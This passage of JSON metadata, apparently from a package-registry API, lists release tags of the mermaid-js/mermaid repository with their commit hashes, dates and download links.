d.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec